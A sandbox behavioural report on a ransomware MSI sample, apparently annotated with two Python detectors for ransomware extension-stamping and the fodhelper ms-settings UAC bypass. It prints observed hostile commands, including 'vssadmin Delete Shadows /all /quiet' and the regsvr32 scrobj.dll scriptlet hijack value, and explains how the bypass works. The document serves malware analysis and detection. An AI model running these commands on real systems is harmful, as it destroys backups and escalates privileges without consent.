Analysis
- max time kernel: 147s
- max time network: 148s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-05-2022 03:43
Static task: static1
Behavioral task: behavioral1 (Sample: 66.msi, Resource: win7-20220414-en)
Behavioral task: behavioral2 (Sample: 66.msi, Resource: win10v2004-20220414-en)
General
- Target: 66.msi
- Size: 96KB
- MD5: 5d4e40d1d41c4588fbf7065fa85454e7
- SHA1: ca876c335ef0a4d90b456f13cc975c04016a5cc1
- SHA256: 4c7314083933a283c87dc28abbed3082040f12e92edac47ff72f8539af6e3ea1
- SHA512: 5f86b37bbdd97ec632e0098d5c2ff71c0a23f547a27493d88d5a0cfa0342e45c39fc79ddbb42e4103a08e7e8a71b88412ca45cbb3b1aed615fdbe4c50d647f3c
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: MsiExec.exe
    File renamed C:\Users\Admin\Pictures\BackupApprove.raw => C:\Users\Admin\Pictures\BackupApprove.raw.xqvpjsclg (MsiExec.exe)
    File renamed C:\Users\Admin\Pictures\GetOptimize.crw => C:\Users\Admin\Pictures\GetOptimize.crw.xqvpjsclg (MsiExec.exe)
    File renamed C:\Users\Admin\Pictures\UpdateJoin.png => C:\Users\Admin\Pictures\UpdateJoin.png.xqvpjsclg (MsiExec.exe)
    File renamed C:\Users\Admin\Pictures\DenyAdd.crw => C:\Users\Admin\Pictures\DenyAdd.crw.xqvpjsclg (MsiExec.exe)
    File renamed C:\Users\Admin\Pictures\InstallBackup.raw => C:\Users\Admin\Pictures\InstallBackup.raw.xqvpjsclg (MsiExec.exe)
    File renamed C:\Users\Admin\Pictures\CompressSwitch.tif => C:\Users\Admin\Pictures\CompressSwitch.tif.xqvpjsclg (MsiExec.exe)
    File opened for modification C:\Users\Admin\Pictures\EditStart.tiff (MsiExec.exe)
    File renamed C:\Users\Admin\Pictures\EditStart.tiff => C:\Users\Admin\Pictures\EditStart.tiff.xqvpjsclg (MsiExec.exe)
    File renamed C:\Users\Admin\Pictures\GrantUninstall.tif => C:\Users\Admin\Pictures\GrantUninstall.tif.xqvpjsclg (MsiExec.exe)
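Analyst note (added example, not part of the sandbox output): the rename records above are the signal a file-monitoring sensor sees during encryption. Every victim file keeps its original extension and gains the same random suffix, here .xqvpjsclg, from one process in quick succession, while the "File opened for modification" record is the encryptor writing the ciphertext before the rename. The Python below parses records in the report's own "File renamed OLD => NEW PROCESS" wording, works out which suffix each rename appends, and reports any process that stamps the same suffix on at least a threshold number of user files. The sample records are constructed from the nine IoCs listed above; the threshold of five is an assumed tuning value, and the function names are the example's own.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed input: the nine records from the report's "Modifies extensions
# of user files" signature, one per line, in the report's own wording.
SAMPLE_EVENTS = r"""
File renamed C:\Users\Admin\Pictures\BackupApprove.raw => C:\Users\Admin\Pictures\BackupApprove.raw.xqvpjsclg MsiExec.exe
File renamed C:\Users\Admin\Pictures\GetOptimize.crw => C:\Users\Admin\Pictures\GetOptimize.crw.xqvpjsclg MsiExec.exe
File renamed C:\Users\Admin\Pictures\UpdateJoin.png => C:\Users\Admin\Pictures\UpdateJoin.png.xqvpjsclg MsiExec.exe
File renamed C:\Users\Admin\Pictures\DenyAdd.crw => C:\Users\Admin\Pictures\DenyAdd.crw.xqvpjsclg MsiExec.exe
File renamed C:\Users\Admin\Pictures\InstallBackup.raw => C:\Users\Admin\Pictures\InstallBackup.raw.xqvpjsclg MsiExec.exe
File renamed C:\Users\Admin\Pictures\CompressSwitch.tif => C:\Users\Admin\Pictures\CompressSwitch.tif.xqvpjsclg MsiExec.exe
File opened for modification C:\Users\Admin\Pictures\EditStart.tiff MsiExec.exe
File renamed C:\Users\Admin\Pictures\EditStart.tiff => C:\Users\Admin\Pictures\EditStart.tiff.xqvpjsclg MsiExec.exe
File renamed C:\Users\Admin\Pictures\GrantUninstall.tif => C:\Users\Admin\Pictures\GrantUninstall.tif.xqvpjsclg MsiExec.exe
"""

# "File renamed OLD => NEW PROCESS": the process is the last whitespace-free token,
# so the lazy NEW group stops at the final space even if paths contain spaces.
RENAME_RE = re.compile(r"^File renamed (?P<old>.+?) => (?P<new>.+?) (?P<proc>\S+)$")


def parse_renames(text):
    """Return (old_path, new_path, process) for every rename record in TEXT;
    other record kinds (opens, writes) are ignored."""
    events = []
    for line in text.strip().splitlines():
        m = RENAME_RE.match(line.strip())
        if m:
            events.append((m["old"], m["new"], m["proc"]))
    return events


def appended_suffix(old, new):
    """Return the single extension NEW appends to OLD (e.g. '.xqvpjsclg'),
    or None when NEW is not simply OLD plus one trailing '.ext'.  Paths are
    compared case-insensitively because NTFS is."""
    if not new.lower().startswith(old.lower()) or len(new) <= len(old):
        return None
    extra = new[len(old):]
    if extra.startswith(".") and "." not in extra[1:] and "\\" not in extra:
        return extra
    return None


def is_user_file(path):
    """True for anything below the Users directory of any drive."""
    parts = PureWindowsPath(path).parts
    return len(parts) > 2 and parts[1].lower() == "users"


def find_extension_bursts(events, threshold=5):
    """Group renames by (process, new suffix) and keep groups where at least
    THRESHOLD distinct user files kept their original extension and gained
    the same new one.  That is the ransomware stamping pattern, as opposed to
    a single save-as or a backup tool writing one .bak file."""
    groups = defaultdict(set)
    for old, new, proc in events:
        suffix = appended_suffix(old, new)
        if suffix and is_user_file(old) and PureWindowsPath(old).suffix:
            groups[(proc, suffix.lower())].add(old)
    return {key: sorted(files) for key, files in groups.items() if len(files) >= threshold}


def analyse(text=SAMPLE_EVENTS, threshold=5):
    return find_extension_bursts(parse_renames(text), threshold)


if __name__ == "__main__":
    for (proc, suffix), files in analyse().items():
        print(f"{proc} appended {suffix} to {len(files)} user files:")
        for f in files:
            print("   ", f)
```

On the report's records this yields one group, MsiExec.exe appending .xqvpjsclg to eight files. The "kept its original extension" condition matters in production: legitimate tools that rewrite a file under a new name (OLD.txt to OLD.bak) do not satisfy it, and a process that touches only one or two files never reaches the threshold.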
- Loads dropped DLL (1 IoC)
  Processes: MsiExec.exe
    pid 928 MsiExec.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: msedge.exe
    Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Windows\CurrentVersion\Run (msedge.exe)
- Enumerates connected drives (3 TTPs, 48 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: msiexec.exe, msiexec.exe
    File opened (read-only) \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: (every drive letter except C: and D:; each letter opened twice, once per msiexec.exe process, 48 records in total) (msiexec.exe)
- Suspicious use of SetThreadContext (3 IoCs)
  Processes: MsiExec.exe
    PID 928 MsiExec.exe set thread context of PID 2648 sihost.exe
    PID 928 MsiExec.exe set thread context of PID 2716 svchost.exe
    PID 928 MsiExec.exe set thread context of PID 2792 taskhostw.exe
- Drops file in Program Files directory (2 IoCs)
  Processes: setup.exe
    File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\bed09973-71fe-469f-9197-1b9db5615ee3.tmp (setup.exe)
    File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523054346.pma (setup.exe)
- Drops file in Windows directory (9 IoCs)
  Processes: msiexec.exe
    File created C:\Windows\Installer\e56d4c9.msi (msiexec.exe)
    File created C:\Windows\Installer\SourceHash{1FB7F52F-AE2D-47D5-93EC-49261060D88C} (msiexec.exe)
    File opened for modification C:\Windows\Installer\MSID94F.tmp (msiexec.exe)
    File created C:\Windows\Installer\inprogressinstallinfo.ipi (msiexec.exe)
    File opened for modification C:\Windows\Installer\MSID5C3.tmp (msiexec.exe)
    File created C:\Windows\Installer\e56d4cb.msi (msiexec.exe)
    File opened for modification C:\Windows\Installer\e56d4c9.msi (msiexec.exe)
    File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log (msiexec.exe)
    File opened for modification C:\Windows\Installer\ (msiexec.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks SCSI registry key(s) (3 TTPs, 5 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Caveat: the writer here is vssvc.exe, the Volume Shadow Copy service, updating partition-manager caches while it services the vssadmin requests seen elsewhere in this report; it is a side effect of the shadow-copy activity, not the sample's own code probing for a sandbox.
  Processes: vssvc.exe
    Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (vssvc.exe)
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters (vssvc.exe)
    Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters (vssvc.exe)
    Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr (vssvc.exe)
    Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (value not shown in source) (vssvc.exe)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: msedge.exe
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
    Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Interacts with shadow copies (2 TTPs, 6 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (six instances)
    pid 5876 vssadmin.exe, pid 5912 vssadmin.exe, pid 3668 vssadmin.exe, pid 2712 vssadmin.exe, pid 4356 vssadmin.exe, pid 5836 vssadmin.exe
- Modifies registry class (15 IoCs)
  Processes: regsvr32.exe, sihost.exe, regsvr32.exe, msedge.exe, regsvr32.exe
    Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings (regsvr32.exe)
    Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b" (regsvr32.exe)
    Set value (int) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" (sihost.exe)
    Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command (regsvr32.exe)
    Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (msedge.exe)
    Set value (int) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" (sihost.exe)
    Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command (regsvr32.exe)
    Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell (regsvr32.exe)
    Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open (regsvr32.exe)
    Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command (regsvr32.exe)
    Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b" (regsvr32.exe)
    Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute (regsvr32.exe)
    Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute (regsvr32.exe)
    Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b" (regsvr32.exe)
    Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute (regsvr32.exe)
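Analyst note (added example, not part of the sandbox output): the regsvr32.exe writes above are the fodhelper.exe UAC bypass. fodhelper.exe is auto-elevated and resolves the ms-settings protocol handler through the per-user Classes hive (HKU\<SID>_Classes is HKCU\Software\Classes), so a user-writable shell\open\command key with an empty DelegateExecute value makes the elevated fodhelper.exe run whatever the key's default value says, with no consent prompt at the default UAC level. Here that value is regsvr32.exe loading scrobj.dll with /i: pointing, through ../../../, at a scriptlet dropped in C:\Users\Public (the kfx5819s5b download listed later in this report). Each of the three injected session processes repeats the write, which is why the same records appear three times. The Python below runs that check over registry-write records: it groups writes under <progid>\shell\<verb>\command for the ProgIDs that auto-elevated binaries consult, rates a default command plus DelegateExecute as high, and inspects the command for the scriptlet-execution tells. The records are constructed from the IoCs above; the severity labels, the ProgID list and the function names are the example's own.

```python
import re
from collections import defaultdict

# Constructed input: the report's "Modifies registry class" IoCs, as
# (operation, target, data, writing process).  A target ending in a
# backslash is the key's (Default) value, as in the report's notation.
HKCU_CLASSES = r"\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes"
CMD_KEY = HKCU_CLASSES + r"\ms-settings\shell\open\command"
PAYLOAD = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b"
SAMPLE_REG_EVENTS = [
    ("Key created", HKCU_CLASSES + r"\ms-settings", None, "regsvr32.exe"),
    ("Key created", HKCU_CLASSES + r"\ms-settings\shell", None, "regsvr32.exe"),
    ("Key created", HKCU_CLASSES + r"\ms-settings\shell\open", None, "regsvr32.exe"),
    ("Key created", CMD_KEY, None, "regsvr32.exe"),
    ("Set value (str)", CMD_KEY + "\\", PAYLOAD, "regsvr32.exe"),
    ("Set value (str)", CMD_KEY + r"\DelegateExecute", "", "regsvr32.exe"),
    # Unrelated writes from the same report, kept as negative cases.
    ("Set value (int)", HKCU_CLASSES + r"\Local Settings\Software\Microsoft\Windows\CurrentVersion"
     r"\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated", "1", "sihost.exe"),
    ("Key created", r"\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance",
     None, "msedge.exe"),
]

# ProgIDs that auto-elevated binaries resolve through the per-user Classes hive:
# ms-settings (fodhelper.exe, computerdefaults.exe) and mscfile (eventvwr.exe).
HIJACKABLE_PROGIDS = {"ms-settings", "mscfile"}
KEY_RE = re.compile(
    r"^\\REGISTRY\\USER\\(?P<sid>S-1-5-21-[\d-]+)_Classes\\(?P<progid>[^\\]+)\\shell\\(?P<verb>[^\\]+)\\command$",
    re.IGNORECASE,
)


def split_target(op, target):
    """Return (key, value_name): value_name is None for key operations and
    '' for the (Default) value."""
    if op.startswith("Key"):
        return target.rstrip("\\"), None
    if target.endswith("\\"):
        return target[:-1], ""
    key, _, name = target.rpartition("\\")
    return key, name


def inspect_command(cmd):
    """Reasons the hijacked verb's command line looks like a LOLBin payload."""
    reasons = []
    low = cmd.lower()
    if "regsvr32" in low and "scrobj.dll" in low and "/i:" in low:
        reasons.append("regsvr32 scrobj.dll /i: scriptlet execution")
        scriptlet = low.split("/i:", 1)[1].split()[0].replace("\\", "/")
        if "../" in scriptlet:
            reasons.append("relative-path traversal to scriptlet")
        if "/users/public/" in scriptlet or "/temp/" in scriptlet:
            reasons.append("scriptlet in world-writable directory")
        if scriptlet.startswith(("http://", "https://")):
            reasons.append("scriptlet fetched from remote URL")
        elif not scriptlet.endswith(".sct"):
            reasons.append("scriptlet has no .sct extension")
    return reasons


def detect_shell_verb_hijack(events):
    r"""Collect writes under HKU\<SID>_Classes\<progid>\shell\<verb>\command for
    hijackable ProgIDs.  A (Default) command alone is medium; a DelegateExecute
    value next to it is what fodhelper.exe needs to run that command at high
    integrity, so that is high."""
    slots = defaultdict(lambda: {"procs": set(), "command": None, "delegate": False})
    for op, target, data, proc in events:
        key, name = split_target(op, target)
        m = KEY_RE.match(key)
        if not m or m["progid"].lower() not in HIJACKABLE_PROGIDS:
            continue
        slot = slots[(m["sid"], m["progid"].lower(), m["verb"].lower())]
        slot["procs"].add(proc)
        if name == "":
            slot["command"] = data or ""
        elif name and name.lower() == "delegateexecute":
            slot["delegate"] = True
    findings = []
    for (sid, progid, verb), slot in slots.items():
        if slot["command"] is None:
            continue
        findings.append({
            "rule": "uac-bypass-shell-verb-hijack",
            "severity": "high" if slot["delegate"] else "medium",
            "sid": sid, "progid": progid, "verb": verb,
            "command": slot["command"],
            "delegate_execute": slot["delegate"],
            "written_by": sorted(slot["procs"]),
            "payload_indicators": inspect_command(slot["command"]),
        })
    return findings


if __name__ == "__main__":
    for f in detect_shell_verb_hijack(SAMPLE_REG_EVENTS):
        print(f"[{f['severity']}] {f['progid']}\\shell\\{f['verb']} hijacked by {f['written_by']}: {f['command']}")
        for reason in f["payload_indicators"]:
            print("   -", reason)
```

Keying on the key path rather than on the writing process is deliberate: the writer here is regsvr32.exe, but in other samples it is reg.exe, PowerShell or the dropper itself, and the hijack key is the constant. In Sysmon terms this is Event ID 13 with TargetObject under HKU\...\_Classes\ms-settings\shell\open\command, which is how the same logic would be expressed as a Sigma rule.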
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes: msiexec.exe, MsiExec.exe, msedge.exe, msedge.exe, identity_helper.exe
    pid 4936 msiexec.exe (x2), pid 928 MsiExec.exe (x2), pid 376 msedge.exe (x2), pid 1344 msedge.exe (x2), pid 1508 identity_helper.exe (x2)
- Suspicious behavior: MapViewOfSection (3 IoCs)
  Processes: MsiExec.exe
    pid 928 MsiExec.exe (x3)
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
  Processes: msedge.exe
    pid 1344 msedge.exe (x5)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: msiexec.exe, msiexec.exe, vssvc.exe
    pid 3124 msiexec.exe (31 records): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
    pid 4936 msiexec.exe (30 records): SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, then SeRestorePrivilege and SeTakeOwnershipPrivilege alternately (27 records)
    pid 2244 vssvc.exe (3 records): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- Suspicious use of FindShellTrayWindow (5 IoCs)
  Processes: msiexec.exe, msedge.exe
    pid 3124 msiexec.exe (x2), pid 1344 msedge.exe (x3)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: msiexec.exe, sihost.exe, svchost.exe, taskhostw.exe, MsiExec.exe, cmd.exe, msedge.exe
    PID 4936 msiexec.exe wrote to memory of PID 2224 srtasks.exe (x2)
    PID 4936 msiexec.exe wrote to memory of PID 928 MsiExec.exe (x2)
    PID 2648 sihost.exe wrote to memory of PID 748 regsvr32.exe (x2)
    PID 2716 svchost.exe wrote to memory of PID 4468 regsvr32.exe (x2)
    PID 2792 taskhostw.exe wrote to memory of PID 4520 regsvr32.exe (x2)
    PID 928 MsiExec.exe wrote to memory of PID 956 cmd.exe (x2)
    PID 956 cmd.exe wrote to memory of PID 1344 msedge.exe (x2)
    PID 1344 msedge.exe wrote to memory of PID 2288 msedge.exe (x2)
    PID 1344 msedge.exe wrote to memory of PID 1048 msedge.exe (x40)
    PID 1344 msedge.exe wrote to memory of PID 376 msedge.exe (x2)
    PID 1344 msedge.exe wrote to memory of PID 1308 msedge.exe (x6)
Processes
(Each line is the image path followed by the command line; indentation shows parent/child depth, and the bullets under a process are the signatures it triggered.)
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc)
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\regsvr32.exe  (cmdline: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd3)
    - Modifies registry class
  C:\Windows\system32\cmd.exe  (cmdline: cmd /c "start fodhelper.exe")
    C:\Windows\system32\fodhelper.exe  (cmdline: fodhelper.exe)
      C:\Windows\system32\regsvr32.exe  (cmdline: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b)
        C:\Windows\System32\vssadmin.exe  (cmdline: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet)
          - Interacts with shadow copies
  C:\Windows\system32\cmd.exe  (cmdline: cmd /c "start fodhelper.exe")
    C:\Windows\system32\fodhelper.exe  (cmdline: fodhelper.exe)
      C:\Windows\system32\regsvr32.exe  (cmdline: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b)
        C:\Windows\System32\vssadmin.exe  (cmdline: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet)
          - Interacts with shadow copies
C:\Windows\system32\sihost.exe  (cmdline: sihost.exe)
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\regsvr32.exe  (cmdline: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd3)
    - Modifies registry class
  C:\Windows\system32\cmd.exe  (cmdline: cmd /c "start fodhelper.exe")
    C:\Windows\system32\fodhelper.exe  (cmdline: fodhelper.exe)
      C:\Windows\system32\regsvr32.exe  (cmdline: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b)
        C:\Windows\System32\vssadmin.exe  (cmdline: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet)
          - Interacts with shadow copies
  C:\Windows\system32\cmd.exe  (cmdline: cmd /c "start fodhelper.exe")
    C:\Windows\system32\fodhelper.exe  (cmdline: fodhelper.exe)
      C:\Windows\system32\regsvr32.exe  (cmdline: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b)
        C:\Windows\System32\vssadmin.exe  (cmdline: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet)
          - Interacts with shadow copies
C:\Windows\system32\taskhostw.exe  (cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E})
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\regsvr32.exe  (cmdline: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd3)
    - Modifies registry class
  C:\Windows\system32\cmd.exe  (cmdline: cmd /c "start fodhelper.exe")
    C:\Windows\system32\fodhelper.exe  (cmdline: fodhelper.exe)
      C:\Windows\system32\regsvr32.exe  (cmdline: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b)
        C:\Windows\System32\vssadmin.exe  (cmdline: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet)
          - Interacts with shadow copies
  C:\Windows\system32\cmd.exe  (cmdline: cmd /c "start fodhelper.exe")
    C:\Windows\system32\fodhelper.exe  (cmdline: fodhelper.exe)
      C:\Windows\system32\regsvr32.exe  (cmdline: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b)
        C:\Windows\System32\vssadmin.exe  (cmdline: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet)
          - Interacts with shadow copies
C:\Windows\system32\msiexec.exe  (cmdline: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\66.msi)
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
C:\Windows\system32\msiexec.exe  (cmdline: C:\Windows\system32\msiexec.exe /V)
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\srtasks.exe  (cmdline: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2)
  C:\Windows\System32\MsiExec.exe  (cmdline: C:\Windows\System32\MsiExec.exe -Embedding D5407ADCBB0E3C6AB912816C76408940)
    - Modifies extensions of user files
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\cmd.exe  (cmdline: cmd /c "start microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg^&1^&38633491^&78^&399^&2219041)
      - Suspicious use of WriteProcessMemory
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg&1&38633491&78&399&2219041)
        - Adds Run key to start application
        - Enumerates system info in registry
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8a07746f8,0x7ff8a0774708,0x7ff8a0774718)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2)
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3)
          - Suspicious behavior: EnumeratesProcesses
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8)
